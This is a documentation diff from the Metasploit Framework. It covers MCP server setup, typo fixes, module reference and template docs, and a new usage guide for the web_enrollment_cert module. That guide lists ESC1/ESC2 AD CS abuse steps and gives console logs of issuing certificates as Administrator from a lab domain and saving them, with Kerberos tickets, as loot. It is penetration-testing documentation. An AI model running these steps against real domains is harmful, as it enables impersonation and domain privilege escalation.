"mcpServers": {
|
||||
"metasploit": {
|
||||
"command": "/path/to/metasploit-framework/msfmcpd",
|
||||
"args": [
|
||||
"--config",
|
||||
"/path/to/config/mcp_config.yaml"
|
||||
],
|
||||
"env": {}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Using RVM
|
||||
|
||||
If you use RVM to manage Ruby versions, specify the full path to RVM so the correct Ruby and gemset are used:
|
||||
|
||||
```json
|
||||
{
|
||||
"mcpServers": {
|
||||
"metasploit": {
|
||||
"command": "/your/home_dir/.rvm/bin/rvm",
|
||||
"args": [
|
||||
"in",
|
||||
"/path/to/metasploit-framework",
|
||||
"do",
|
||||
"./msfmcpd",
|
||||
"--config",
|
||||
"config/mcp_config.yaml"
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Security Considerations
|
||||
|
||||
### Input Validation
|
||||
|
||||
All tool parameters are validated against strict JSON schemas. IP addresses are validated using Ruby's `IPAddr` class with CIDR support, workspace names are restricted to alphanumeric characters plus underscore/hyphen, port ranges are validated (1-65535), and search queries are limited to 500 characters.
|
||||
|
||||
### Credential Management
|
||||
|
||||
Configuration files should use `chmod 600` permissions. Credentials are transmitted securely to the Metasploit Framework API and are never cached or logged by the MCP server.
|
||||
|
||||
### Rate Limiting
|
||||
|
||||
The server applies rate limiting to all MCP tools using a token bucket algorithm. Default: 60 requests per minute with a burst of 10 requests. This is configurable in the `rate_limit` section of the configuration file.
|
||||
|
||||
### Logging
|
||||
|
||||
Logging is disabled by default. When enabled (via `--enable-logging` or config), sensitive data (passwords, tokens, API keys) is automatically redacted. Log files should be protected with `chmod 600`.
|
||||
|
||||
### Error Handling
|
||||
|
||||
Stack traces are never exposed to clients. Error messages are sanitized to avoid leaking credentials. Metasploit API errors are wrapped in the MCP error format.
|
||||
|
||||
## Testing with MCP Inspector
|
||||
|
||||
The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. It runs directly through `npx`:
|
||||
|
||||
```
|
||||
npx @modelcontextprotocol/inspector
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Connection Refused or Timeout
|
||||
|
||||
1. Verify the RPC daemon is running: `ps aux | grep msfrpcd`
|
||||
2. Check the port is listening: `netstat -an | grep 55553`
|
||||
3. Test connectivity: `curl -k -v https://localhost:55553/api/`
|
||||
|
||||
### Authentication Failures
|
||||
|
||||
For MessagePack RPC, verify the username and password in your configuration file or CLI arguments. For JSON-RPC, verify the bearer token is valid and has not expired.
|
||||
|
||||
### Database Not Available
|
||||
|
||||
If database-dependent tools return errors, ensure the database is running:
|
||||
|
||||
```
|
||||
msfdb init
|
||||
msfdb start
|
||||
```
|
||||
|
||||
Then restart the MCP server.
|
||||
|
||||
### Rate Limit Exceeded
|
||||
|
||||
Increase the rate limit in your configuration file:
|
||||
|
||||
```yaml
|
||||
rate_limit:
|
||||
requests_per_minute: 120
|
||||
burst_size: 20
|
||||
```
|
||||
@@ -14,7 +14,7 @@ Metasploit currently provides multiple options for configuring target details:
|
||||
|
||||
Configuring this amount of options is cumbersome and time consuming on a per module basis.
|
||||
|
||||
Although it is is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
|
||||
Although it is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
|
||||
|
||||
```
|
||||
setg RHOSTS x.x.x.x
|
||||
|
||||
@@ -1,26 +1,29 @@
|
||||
## On this page
|
||||
* [List of supported reference identifiers](#list-of-supported-reference-identifiers)
|
||||
* [Code example of references in a module](#code-example-of-references-in-a-module)
|
||||
- [On this page](#on-this-page)
|
||||
- [List of supported reference identifiers](#list-of-supported-reference-identifiers)
|
||||
- [Code example of references in a module](#code-example-of-references-in-a-module)
|
||||
|
||||
|
||||
A reference in a Metasploit module is a source of information related to the module. This can be a link to the vulnerability advisory, a news article, a blog post about a specific technique the module uses, a specific tweet, etc. The more you have the better. However, you should not use this as a form of advertisement.
|
||||
|
||||
## List of supported reference identifiers
|
||||
|
||||
ID | Source | Code Example
|
||||
------------- | ------------- | -------------
|
||||
CVE | cvedetails.com | ```['CVE', '2014-9999']```
|
||||
CWE | cwe.mitre.org | ```['CWE', '90']```
|
||||
BID | securityfocus.com | ```['BID', '1234']```
|
||||
MSB | technet.microsoft.com | ```['MSB', 'MS13-055']```
|
||||
EDB | exploit-db.com | ```['EDB', '1337']```
|
||||
US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']```
|
||||
ZDI | zerodayinitiative.com | ```['ZDI', '10-123']```
|
||||
WPVDB | wpvulndb.com | ```['WPVDB', '7615']```
|
||||
PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']```
|
||||
GHSA | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']```
|
||||
URL | anything | ```['URL', 'http://example.com/blog.php?id=123']```
|
||||
AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~
|
||||
| ID | Source | Code Example |
|
||||
| ------------------- | ------------------------------------------------------------------ | ---------------------------------------------------------------------------------- |
|
||||
| CVE | cvedetails.com | ```['CVE', '2014-9999']``` |
|
||||
| CWE | cwe.mitre.org | ```['CWE', '90']``` |
|
||||
| BID | securityfocus.com | ```['BID', '1234']``` |
|
||||
| MSB | technet.microsoft.com | ```['MSB', 'MS13-055']``` |
|
||||
| EDB | exploit-db.com | ```['EDB', '1337']``` |
|
||||
| US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']``` |
|
||||
| ZDI | zerodayinitiative.com | ```['ZDI', '10-123']``` |
|
||||
| WPVDB | wpvulndb.com | ```['WPVDB', '7615']``` |
|
||||
| PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']``` |
|
||||
| GHSA | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']``` |
|
||||
| OSV | osv.dev | ```['OSV', 'GHSA-xxxx-xxxx-xxxx']``` |
|
||||
| ATT&CK | attack.mitre.org | ```['ATT&CK', 'T1190']``` |
|
||||
| URL | anything | ```['URL', 'http://example.com/blog.php?id=123']``` |
|
||||
| AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~ |
|
||||
|
||||
> **Good to know**
|
||||
> AKA names for modules are no longer stored as a reference identifier, but rather in the `Notes` metadata field as shown in the example below.
|
||||
@@ -42,8 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Unknown' ],
|
||||
'References' => [
|
||||
[ 'CVE', '2014-9999' ],
|
||||
['CVE', '2014-9999'],
|
||||
['BID', '1234'],
|
||||
['GHSA', 'xxxx-xxxx-xxxx'], # global advisory
|
||||
['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo'], # repository-scoped advisory
|
||||
['URL', 'http://example.com/blog.php?id=123']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
|
||||
@@ -444,7 +444,7 @@ Now edit the `proxychains` configuration file located at `/etc/proxychains.conf`
|
||||
socks5 127.0.0.1 1080
|
||||
```
|
||||
|
||||
The final final should look something like this:
|
||||
The final file should look something like this:
|
||||
|
||||
```ini
|
||||
# proxychains.conf VER 3.1
|
||||
@@ -567,7 +567,7 @@ index.html 100%[===========================>] 57.34K --.-KB/s i
|
||||
```
|
||||
|
||||
### Scanning
|
||||
For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UPD traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
|
||||
For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UDP traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
|
||||
|
||||
For Nmap and Zenmap, the below example shows the commands can be used. It is best to be selective on ports to scan since scanning through the proxy tunnel can be slow.
|
||||
|
||||
|
||||
@@ -37,8 +37,6 @@ For full details:
|
||||
If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:
|
||||
|
||||
```bash
|
||||
mkdir -p $HOME/.msf4/modules/exploits/test
|
||||
curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
|
||||
todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
|
||||
todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb
|
||||
% Total % Received % Xferd Average Speed Time Time Time Current
|
||||
|
||||
@@ -17,16 +17,16 @@ Contributing modules in [GO](https://golang.org/) can be achieved in a few simpl
|
||||
import "metasploit/module"
|
||||
func main() {
|
||||
metadata := &module.Metadata{
|
||||
Name: "<module name",
|
||||
Name: "<module name>",
|
||||
Description: "<describe>",
|
||||
Authors: []string{"<author 1>", "<author 2>"},
|
||||
Date: "<date module written",
|
||||
Date: "<date module written>",
|
||||
Type:"<module type>",
|
||||
Privileged: <true|false>,
|
||||
References: []module.Reference{},
|
||||
Options: map[string]module.Option{
|
||||
"<option 1": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
|
||||
"<option 2": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
|
||||
"<option 1>": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
|
||||
"<option 2>": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
|
||||
}}
|
||||
|
||||
module.Init(metadata, <the entry method to your module>)
|
||||
|
||||
@@ -151,7 +151,7 @@ Run
|
||||
"id": {"type": "string"},
|
||||
"method": {"enum": ["run"]},
|
||||
"params": {
|
||||
"type": "object"
|
||||
"type": "object",
|
||||
"additionalProperties": false,
|
||||
"patternProperties": {
|
||||
"^[^=]*$": {
|
||||
@@ -181,7 +181,7 @@ Run
|
||||
"id": {"type": "string"},
|
||||
"result": {
|
||||
"type": "object",
|
||||
"required": ["message"]
|
||||
"required": ["message"],
|
||||
"properties": {
|
||||
"message": {"type": "string"},
|
||||
"return": {"type": "string"}
|
||||
|
||||
@@ -448,6 +448,9 @@ NAVIGATION_CONFIG = [
|
||||
{
|
||||
path: 'How-to-use-Metasploit-with-ngrok.md'
|
||||
},
|
||||
{
|
||||
path: 'How-to-use-Metasploit-MCP-Server.md'
|
||||
},
|
||||
]
|
||||
},
|
||||
]
|
||||
|
||||
@@ -0,0 +1,485 @@
|
||||
## Vulnerable Application
|
||||
This module makes authenticated requests to an Active Directory Certificate Services Web enrollment portal to gain
|
||||
a list of available templates and/or generate certificates based on the available templates.
|
||||
This is the same basic action as `auxiliary/server/relay/esc8` but rather then relaying NTLM credentials, we are
|
||||
authenticating with credentials we have.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
### NTLM
|
||||
1. Install and configure the application
|
||||
* See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
|
||||
2. Start `msfconsole`
|
||||
2. Do: `use auxiliary/admin/http/web_enrollment_cert`
|
||||
3. Set the `RHOSTS` option to the AD CS Web Enrollment server
|
||||
4. Set the `HTTP::Auth` option to `ntlm`
|
||||
4. Set the `HttpUsername` option to a valid user
|
||||
4. Set the `HttpPassword` option to a valid user password
|
||||
4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
|
||||
|
||||
### Kerberos
|
||||
1. Install and configure the application
|
||||
* See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
|
||||
2. Start `msfconsole`
|
||||
2. Do: `use auxiliary/admin/http/web_enrollment_cert`
|
||||
3. Set the `RHOSTS` option to the AD CS Web Enrollment server
|
||||
4. Set the `HTTP::Auth` option to `kerberos`
|
||||
5. Set the `DOMAIN` option to the FQDN
|
||||
6. Set the `DomainControllerRhost` if it is not available through DNS
|
||||
4. Set the `HttpUsername` option to a valid user
|
||||
4. Set the `HttpPassword` option to a valid user password
|
||||
4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
|
||||
|
||||
### ESC1
|
||||
1. Install and configure the application with ESC1 vulnerable template
|
||||
* https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
|
||||
2. Follow steps above based on authentication type
|
||||
4. Set `MODE` to `SPECIFIC_TEMPLATE`
|
||||
3. Set `CERT_TEMPLATE` to a template vulnerable to ESC1
|
||||
4. Set `ALT_UPN` to the desired User
|
||||
5. Set `ALT_SID` to the desired SID, if necessary
|
||||
6. Set `ALT_DNS` if required
|
||||
|
||||
### ESC2
|
||||
1. Install and configure the application with ESC2 vulnerable template
|
||||
* https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
|
||||
2. Follow steps above based on authentication type
|
||||
4. Set `MODE` to `SPECIFIC_TEMPLATE`
|
||||
3. Set `CERT_TEMPLATE` to a template vulnerable to ESC2
|
||||
4. Set `ON_BEHALF_OF` to the desired User
|
||||
5. Set `PFX` to the desired certificate file
|
||||
|
||||
## Options
|
||||
|
||||
### MODE
|
||||
The issue mode. This controls what the module will do once an authenticated session is established to the Web Enrollment
|
||||
server. Must be one of the following options:
|
||||
|
||||
* ALL: Enumerate all available certificate templates and then issue each of them
|
||||
* QUERY_ONLY: Enumerate all available certificate templates but do not issue any. Not all certificate templates
|
||||
available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and
|
||||
include `Machine` (AKA `Computer`) and `DomainController`
|
||||
* SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option
|
||||
|
||||
### CERT_TEMPLATE
|
||||
The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 2019
|
||||
#### NTLM with MODE ALL
|
||||
```msf
|
||||
msf > use auxiliary/admin/http/web_enrollment_cert
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set rhost 10.5.132.180
|
||||
rhost => 10.5.132.180
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set httpusername Administrator
|
||||
httpusername => Administrator
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
|
||||
httppassword => v3Mpassword
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set DOMAIN EXAMPLE
|
||||
DOMAIN => EXAMPLE
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set MODE ALL
|
||||
MODE => ALL
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > set HTTP::AUTH ntlm
|
||||
HTTP::AUTH => ntlm
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > show options
|
||||
|
||||
Module options (auxiliary/admin/http/web_enrollment_cert):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ALT_DNS no Alternative certificate DNS
|
||||
ALT_SID no Alternative object SID
|
||||
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
|
||||
HttpPassword v3Mpassword no The HTTP password to specify for authentication
|
||||
HttpUsername Administrator no The HTTP username to specify for authentication
|
||||
MODE ALL yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
|
||||
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
|
||||
PFX no Certificate to request on behalf of
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
|
||||
h, sapni, socks4, http, socks5
|
||||
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
|
||||
metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /certsrv/ yes The URI for the cert server.
|
||||
THREADS 1 yes The number of concurrent threads (max one per host)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When MODE is SPECIFIC_TEMPLATE:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CERT_TEMPLATE no The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > run
|
||||
[*] Retrieving available template list, this may take a few minutes
|
||||
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
|
||||
[+] Available Certificates for EXAMPLE\\Administrator on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
|
||||
[+] Certificate generated using template User and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template User saved to /home/tmoose/.msf4/loot/20260116142051_default_10.5.132.180_windows.ad.cs_263748.pfx
|
||||
[+] Certificate generated using template EFS and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template EFS saved to /home/tmoose/.msf4/loot/20260116142053_default_10.5.132.180_windows.ad.cs_150446.pfx
|
||||
[+] Certificate generated using template Administrator and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template Administrator saved to /home/tmoose/.msf4/loot/20260116142055_default_10.5.132.180_windows.ad.cs_586273.pfx
|
||||
[+] Certificate generated using template EFSRecovery and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116142057_default_10.5.132.180_windows.ad.cs_077399.pfx
|
||||
[+] Certificate generated using template ESC16_1 and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template ESC16_1 saved to /home/tmoose/.msf4/loot/20260116142101_default_10.5.132.180_windows.ad.cs_832421.pfx
|
||||
[+] Certificate generated using template ESC2-Template and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template ESC2-Template saved to /home/tmoose/.msf4/loot/20260116142102_default_10.5.132.180_windows.ad.cs_548200.pfx
|
||||
[+] Certificate generated using template WebServer and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template WebServer saved to /home/tmoose/.msf4/loot/20260116142103_default_10.5.132.180_windows.ad.cs_191863.pfx
|
||||
[+] Certificate generated using template SubCA and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template SubCA saved to /home/tmoose/.msf4/loot/20260116142105_default_10.5.132.180_windows.ad.cs_300086.pfx
|
||||
[+] Certificate generated using template ESC1-Template and EXAMPLE\\Administrator
|
||||
[+] Certificate for EXAMPLE\\Administrator using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116142106_default_10.5.132.180_windows.ad.cs_017489.pfx
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
msf auxiliary(admin/http/web_enrollment_cert) >
|
||||
|
||||
```
|
||||
|
||||
#### Kerberos MODE:ALL
|
||||
```msf
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > show options
|
||||
|
||||
Module options (auxiliary/admin/http/web_enrollment_cert):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ALT_DNS no Alternative certificate DNS
|
||||
ALT_SID no Alternative object SID
|
||||
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
|
||||
HttpPassword v3Mpassword no The HTTP password to specify for authentication
|
||||
HttpUsername Administrator no The HTTP username to specify for authentication
|
||||
MODE ALL yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
|
||||
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
|
||||
PFX no Certificate to request on behalf of
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
|
||||
h, sapni, socks4, http, socks5
|
||||
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
|
||||
metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /certsrv/ yes The URI for the cert server.
|
||||
THREADS 1 yes The number of concurrent threads (max one per host)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
When MODE is SPECIFIC_TEMPLATE:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CERT_TEMPLATE no The template to issue if MODE is SPECIFIC_TEMPLATE.
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > show advanced
|
||||
|
||||
Module advanced options (auxiliary/admin/http/web_enrollment_cert):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
DOMAIN example.com yes The domain to use for Windows authentication (Must be FQDN
|
||||
if HTTP:Auth is Kerberos)
|
||||
DigestAlgorithm SHA256 yes The digest algorithm to use (Accepted: SHA1, SHA256)
|
||||
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to
|
||||
false for non-IIS servers
|
||||
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
|
||||
HTTP::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm,
|
||||
kerberos, plaintext, none)
|
||||
HttpClientTimeout no HTTP connection and receive timeout
|
||||
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing
|
||||
headers
|
||||
HttpTrace false no Show the raw HTTP requests and responses
|
||||
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to d
|
||||
isable)
|
||||
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
|
||||
SSLKeyLogFile no The SSL key log file
|
||||
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and S
|
||||
SL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3
|
||||
, TLS1, TLS1.1, TLS1.2)
|
||||
ShowProgress true yes Display progress messages during a scan
|
||||
ShowProgressPercent 10 yes The interval in percent that progress should be shown
|
||||
UserAgent Mozilla/5.0 (Macintosh; Intel Mac no The User-Agent header to use for all requests
|
||||
OS X 10_15_7) AppleWebKit/537.36
|
||||
(KHTML, like Gecko) Chrome/131.0
|
||||
.0.0 Safari/537.36
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
|
||||
When HTTP::Auth is kerberos:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
DomainControllerRhost 10.5.132.180 no The resolvable rhost for the Domain Controller
|
||||
HTTP::Krb5Ccname no The ccache file to use for kerberos authentication
|
||||
HTTP::KrbOfferedEncryptionType AES256,AES128,RC4-HMAC,DES-CBC yes Kerberos encryption types to offer
|
||||
s -MD5,DES3-CBC-SHA1
|
||||
HTTP::Rhostname WIN-DRC9HCDIMAT no The rhostname which is required for kerberos - the SPN
|
||||
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, re
|
||||
ad-only, write-only, read-write)
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf auxiliary(admin/http/web_enrollment_cert) > run
|
||||
[*] Retrieving available template list, this may take a few minutes
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_557407.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143502_default_10.5.132.180_mit.kerberos.cca_545138.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
|
||||
[+] Available Certificates for on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_606180.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143520_default_10.5.132.180_mit.kerberos.cca_023162.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template User and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_548243.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143537_default_10.5.132.180_mit.kerberos.cca_843349.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116143538_default_10.5.132.180_windows.ad.cs_760252.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_236912.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143541_default_10.5.132.180_mit.kerberos.cca_237890.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template EFS and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_360144.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143543_default_10.5.132.180_mit.kerberos.cca_009299.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template EFS saved to /home/tmoose/.msf4/loot/20260116143544_default_10.5.132.180_windows.ad.cs_150360.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143546_default_10.5.132.180_mit.kerberos.cca_444407.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143547_default_10.5.132.180_mit.kerberos.cca_460069.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template Administrator and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143548_default_10.5.132.180_mit.kerberos.cca_941754.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_mit.kerberos.cca_484741.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template Administrator saved to /home/tmoose/.msf4/loot/20260116143549_default_10.5.132.180_windows.ad.cs_088506.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_665940.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143552_default_10.5.132.180_mit.kerberos.cca_324874.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate generated using template EFSRecovery and
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_559229.bin
|
||||
[+] 10.5.132.180:88 - Received a valid TGS-Response
|
||||
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_mit.kerberos.cca_295382.bin
|
||||
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
|
||||
[+] Certificate for using template EFSRecovery saved to /home/tmoose/.msf4/loot/20260116143554_default_10.5.132.180_windows.ad.cs_477946.pfx
|
||||
[+] 10.5.132.180:88 - Received a valid TGT-Response
|
||||
